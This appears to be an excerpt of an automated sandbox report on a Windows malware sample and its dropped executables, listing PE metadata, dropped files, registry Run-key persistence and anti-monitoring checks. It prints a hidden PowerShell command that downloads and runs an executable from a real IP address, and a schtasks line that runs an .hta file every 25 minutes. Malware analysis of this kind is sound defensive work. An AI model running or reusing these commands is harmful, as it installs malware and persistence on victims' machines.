Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: real checksum: 0x1b5975 should be: 0x1b5bb5
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: real checksum: 0x1b5975 should be: 0x1b5bb5
Source: jROrnzx.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0xb2179
Source: d2YQIJa[1].exe.4.dr	Static PE information: real checksum: 0x1f9b28 should be: 0x1f6e6f
Source: DTQCxXZ[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0x6219a
Source: 7aencsM.exe0.4.dr	Static PE information: real checksum: 0x0 should be: 0x48d4c
Source: Bjkm5hE[1].exe.4.dr	Static PE information: real checksum: 0x11706 should be: 0x640ab
Source: Bjkm5hE.exe.4.dr	Static PE information: real checksum: 0x11706 should be: 0x640ab

Source: hHtR1O06GH.exe	Static PE information: section name:
Source: hHtR1O06GH.exe	Static PE information: section name: .idata
Source: hHtR1O06GH.exe	Static PE information: section name:
Source: hHtR1O06GH.exe	Static PE information: section name: bxgyntvf
Source: hHtR1O06GH.exe	Static PE information: section name: pcvkkvdt
Source: hHtR1O06GH.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: bxgyntvf
Source: skotes.exe.0.dr	Static PE information: section name: pcvkkvdt
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: Ta3ZyUR.exe.4.dr	Static PE information: section name: .iat
Source: 7aencsM.exe.4.dr	Static PE information: section name: .iat
Source: 7aencsM.exe.4.dr	Static PE information: section name: .iat
Source: Ta3ZyUR[1].exe.4.dr	Static PE information: section name: .iat
Source: m5UP2Yj[1].exe.4.dr	Static PE information: section name:
Source: m5UP2Yj[1].exe.4.dr	Static PE information: section name: .idata
Source: m5UP2Yj[1].exe.4.dr	Static PE information: section name:
Source: m5UP2Yj[1].exe.4.dr	Static PE information: section name: fjzodoul
Source: m5UP2Yj[1].exe.4.dr	Static PE information: section name: rhrkzbru
Source: m5UP2Yj[1].exe.4.dr	Static PE information: section name: .taggant
Source: m5UP2Yj.exe.4.dr	Static PE information: section name:
Source: m5UP2Yj.exe.4.dr	Static PE information: section name: .idata
Source: m5UP2Yj.exe.4.dr	Static PE information: section name:
Source: m5UP2Yj.exe.4.dr	Static PE information: section name: fjzodoul
Source: m5UP2Yj.exe.4.dr	Static PE information: section name: rhrkzbru
Source: m5UP2Yj.exe.4.dr	Static PE information: section name: .taggant
Source: jROrnzx[1].exe.4.dr	Static PE information: section name: .iat
Source: jROrnzx[1].exe.4.dr	Static PE information: section name: .iat
Source: jROrnzx.exe.4.dr	Static PE information: section name: .iat
Source: jROrnzx.exe.4.dr	Static PE information: section name: .iat
Source: Ta3ZyUR.exe0.4.dr	Static PE information: section name: .iat
Source: 7aencsM[1].exe.4.dr	Static PE information: section name: .iat
Source: 7aencsM[1].exe.4.dr	Static PE information: section name: .iat
Source: 7aencsM.exe0.4.dr	Static PE information: section name: .iat
Source: 7aencsM.exe0.4.dr	Static PE information: section name: .iat
Source: d2YQIJa[1].exe.4.dr	Static PE information: section name:
Source: d2YQIJa[1].exe.4.dr	Static PE information: section name: .idata
Source: d2YQIJa[1].exe.4.dr	Static PE information: section name:
Source: d2YQIJa[1].exe.4.dr	Static PE information: section name: cwnawalb
Source: d2YQIJa[1].exe.4.dr	Static PE information: section name: sujpihud
Source: d2YQIJa[1].exe.4.dr	Static PE information: section name: .taggant
Source: d2YQIJa.exe.4.dr	Static PE information: section name:
Source: d2YQIJa.exe.4.dr	Static PE information: section name: .idata
Source: d2YQIJa.exe.4.dr	Static PE information: section name:
Source: d2YQIJa.exe.4.dr	Static PE information: section name: cwnawalb
Source: d2YQIJa.exe.4.dr	Static PE information: section name: sujpihud
Source: d2YQIJa.exe.4.dr	Static PE information: section name: .taggant
Source: Bjkm5hE[1].exe.4.dr	Static PE information: section name: .iat
Source: Bjkm5hE.exe.4.dr	Static PE information: section name: .iat
Source: random[1].exe0.4.dr	Static PE information: section name:
Source: random[1].exe0.4.dr	Static PE information: section name: .idata
Source: random[1].exe0.4.dr	Static PE information: section name:
Source: random[1].exe0.4.dr	Static PE information: section name: evmhwrvh
Source: random[1].exe0.4.dr	Static PE information: section name: fjydbita
Source: random[1].exe0.4.dr	Static PE information: section name: .taggant
Source: 7b63166ddf.exe.4.dr	Static PE information: section name:
Source: 7b63166ddf.exe.4.dr	Static PE information: section name: .idata
Source: 7b63166ddf.exe.4.dr	Static PE information: section name:
Source: 7b63166ddf.exe.4.dr	Static PE information: section name: evmhwrvh
Source: 7b63166ddf.exe.4.dr	Static PE information: section name: fjydbita
Source: 7b63166ddf.exe.4.dr	Static PE information: section name: .taggant
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: section name:
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: section name: .idata
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: section name:
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: section name: oxaitfam
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: section name: pgbyiblb
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: section name: .taggant
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: section name:
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: section name: .idata
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: section name:
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: section name: oxaitfam
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: section name: pgbyiblb
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_0046D91C push ecx; ret	4_2_0046D92F
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004228B8 push 892ADB51h; retf	9_2_004228BD
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_00445AC0 push eax; mov dword ptr [esp], 223D3C6Fh	9_2_00445AC2
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Code function: 9_2_004226DA push esi; ret	9_2_004226DC
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Code function: 14_3_03F5D35A push ebp; retf	14_3_03F5D35B

Source: hHtR1O06GH.exe	Static PE information: section name: entropy: 7.125577836668062
Source: hHtR1O06GH.exe	Static PE information: section name: bxgyntvf entropy: 7.953589295378259
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.125577836668062
Source: skotes.exe.0.dr	Static PE information: section name: bxgyntvf entropy: 7.953589295378259
Source: m5UP2Yj[1].exe.4.dr	Static PE information: section name: fjzodoul entropy: 7.954908380657124
Source: m5UP2Yj.exe.4.dr	Static PE information: section name: fjzodoul entropy: 7.954908380657124
Source: d2YQIJa[1].exe.4.dr	Static PE information: section name: entropy: 7.098761781185786
Source: d2YQIJa[1].exe.4.dr	Static PE information: section name: cwnawalb entropy: 7.952761382939882
Source: d2YQIJa.exe.4.dr	Static PE information: section name: entropy: 7.098761781185786
Source: d2YQIJa.exe.4.dr	Static PE information: section name: cwnawalb entropy: 7.952761382939882
Source: random[1].exe0.4.dr	Static PE information: section name: entropy: 7.970055288165833
Source: random[1].exe0.4.dr	Static PE information: section name: evmhwrvh entropy: 7.954741246270185
Source: 7b63166ddf.exe.4.dr	Static PE information: section name: entropy: 7.970055288165833
Source: 7b63166ddf.exe.4.dr	Static PE information: section name: evmhwrvh entropy: 7.954741246270185
Source: TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE.32.dr	Static PE information: section name: oxaitfam entropy: 7.952623880987054
Source: TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE.62.dr	Static PE information: section name: oxaitfam entropy: 7.952623880987054

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ta3ZyUR[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1085390001\qFqSpAp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1085388001\d2YQIJa.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempHLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1085389001\Bjkm5hE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Bjkm5hE[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1085392001\7b63166ddf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\7aencsM[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\jROrnzx[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\DTQCxXZ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1085386001\Ta3ZyUR.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\qFqSpAp[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\m5UP2Yj[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1085387001\DTQCxXZ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\d2YQIJa[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9db7f37142.exe			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f

Source: C:\Users\user\Desktop\hHtR1O06GH.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9db7f37142.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9db7f37142.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd	Jump to behavior

Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
